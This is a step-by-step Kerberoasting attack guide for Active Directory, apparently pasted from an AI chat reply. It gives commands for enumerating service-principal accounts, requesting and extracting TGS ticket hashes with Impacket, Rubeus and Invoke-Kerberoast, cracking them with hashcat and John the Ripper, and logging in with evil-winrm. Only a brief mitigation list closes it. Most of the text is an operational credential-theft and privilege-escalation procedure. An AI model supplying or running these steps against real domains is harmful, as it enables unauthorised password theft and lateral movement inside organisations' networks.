Kerberoasting Attack Step by Step Guide
Step 1: Enumerate Domain Users with SPN
Kerberoasting targets accounts with Service Principal Names (SPNs). First, enumerate users with SPNs.
Command:
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalNameAlternatively, using Impacket:
GetUserSPNs.py -dc-ip <Domain_Controller_IP> <DOMAIN>/<User>:<Password>Step 2: Request a Ticket Granting Service (TGS) Ticket
Once an SPN is found, request a TGS ticket for that service.
Command:
GetUserSPNs.py -request -dc-ip <Domain_Controller_IP> <DOMAIN>/<User>:<Password>or using Rubeus:
Rubeus.exe kerberoastStep 3: Extract and Save TGS Hashes
The obtained TGS hash can be extracted for offline cracking.
Command:
Rubeus.exe kerberoast /format:hashcator
Invoke-Kerberoast | Format-Table -AutoSizeStep 4: Crack the TGS Hash Offline
Use Hashcat to crack the extracted hash.
Command:
hashcat -m 13100 <hashfile> /path/to/wordlist.txt --forceor using John the Ripper:
john --format=krb5tgs --wordlist=/path/to/wordlist.txt <hashfile>Step 5: Use the Obtained Credentials
If the hash is successfully cracked, use the password to access the service or escalate privileges.
Command to test access:
New-PSSession -ComputerName <Target_Machine> -Credential <DOMAIN>\<User>or using Evil-WinRM:
evil-winrm -i <Target_IP> -u <User> -p <Password>Mitigation Steps:
Enforce strong passwords for service accounts.
Regularly rotate service account passwords.
Implement the principle of least privilege.
Monitor Kerberos ticket requests for anomalies.
Let me know if you need additional details or modifications!
Last updated